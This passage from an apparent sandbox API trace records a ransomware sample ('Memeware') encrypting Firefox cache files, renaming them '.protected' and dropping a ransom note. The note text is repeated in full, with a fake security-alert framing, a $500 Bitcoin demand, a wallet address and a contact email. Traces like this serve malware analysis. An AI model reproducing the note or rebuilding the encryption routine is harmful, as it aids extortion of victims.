lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Windows") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Program Files") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Program Files (x86)") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="$Recycle.bin") returned 1 [0086.179] lstrcmpiW (lpString1="3", lpString2="System Volume Information") returned -1 [0086.179] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned 97 [0086.179] lstrcmpW (lpString1="3", lpString2=".") returned 1 [0086.179] lstrcmpW (lpString1="3", lpString2="..") returned 1 [0086.179] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*") returned 99 [0086.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.180] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.180] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\.") returned 99 [0086.180] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.180] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.180] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.181] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\..") returned 100 [0086.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.181] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Windows") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Program Files") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Program Files (x86)") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="$Recycle.bin") returned 1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="System Volume Information") returned -1 [0086.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned 100 [0086.181] lstrcmpW (lpString1="4B", lpString2=".") returned 1 [0086.181] lstrcmpW (lpString1="4B", lpString2="..") returned 1 [0086.182] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*") returned 102 [0086.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.182] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.182] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.182] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1=".", lpString2="System Volume 
Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\.") returned 102 [0086.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.183] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\..") returned 103 [0086.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.183] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Windows") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Program Files") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="Program Files (x86)") returned -1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="$Recycle.bin") returned 1 [0086.183] lstrcmpiW (lpString1="1D8FDd01", lpString2="System Volume Information") returned -1 [0086.183] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.183] StrStrIW (lpFirst="1D8FDd01", 
lpSrch=".protected") returned 0x0 [0086.183] lstrcmpW (lpString1="1D8FDd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.184] StrStrW (lpFirst="1D8FDd01", lpSrch=".txt") returned 0x0 [0086.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.184] StrStrW (lpFirst="1D8FDd01", lpSrch=".rar") returned 0x0 [0086.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01") returned 109 [0086.185] StrStrW (lpFirst="1D8FDd01", lpSrch=".zip") returned 0x0 [0086.185] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0086.187] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.187] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.188] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.188] CloseHandle (hObject=0x160) returned 1 [0086.188] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.protected") returned 119 [0086.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.protected")) returned 1 [0086.189] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.189] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.189] wnsprintfW (in: 
pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\RESTORE_FILES.txt") returned 118 [0086.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.190] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.190] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.191] lstrlenA (lpString="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") returned 684 [0086.191] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.191] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.191] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.191] CloseHandle (hObject=0x15c) returned 1 [0086.191] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.191] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.191] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\RESTORE_FILES.txt") returned 115 [0086.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.192] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.193] lstrlenA (lpString="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") returned 684 [0086.193] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.193] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.193] CloseHandle (hObject=0x158) returned 1 [0086.194] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.194] lstrcmpiW (lpString1="4", lpString2="Windows") returned -1 [0086.194] lstrcmpiW (lpString1="4", lpString2="Program Files") returned -1 [0086.195] lstrcmpiW (lpString1="4", lpString2="Program Files (x86)") returned -1 [0086.195] lstrcmpiW (lpString1="4", lpString2="$Recycle.bin") returned 1 [0086.195] lstrcmpiW (lpString1="4", lpString2="System Volume Information") returned -1 [0086.195] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned 97 [0086.195] lstrcmpW (lpString1="4", lpString2=".") returned 1 [0086.195] lstrcmpW (lpString1="4", lpString2="..") returned 1 [0086.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*") returned 99 [0086.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.195] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.195] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.195] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.195] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\.") returned 99 
[0086.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.195] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\..") returned 100 [0086.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.196] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.196] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.196] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\RESTORE_FILES.txt") returned 115 [0086.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\4\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.197] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.197] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.197] lstrlenA (lpString="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") returned 684 [0086.197] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.198] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.198] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.198] CloseHandle (hObject=0x158) returned 1 [0086.198] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Windows") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Program Files") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="Program Files (x86)") returned -1 [0086.198] lstrcmpiW (lpString1="5", lpString2="$Recycle.bin") returned 1 [0086.198] lstrcmpiW (lpString1="5", lpString2="System Volume Information") returned -1 [0086.198] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned 97 [0086.198] lstrcmpW (lpString1="5", lpString2=".") returned 1 [0086.198] lstrcmpW (lpString1="5", lpString2="..") returned 1 [0086.198] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*") returned 99 [0086.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.199] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\.") returned 99 [0086.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.199] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\..") returned 100 [0086.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.199] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.199] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5\\RESTORE_FILES.txt") returned 115 [0086.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 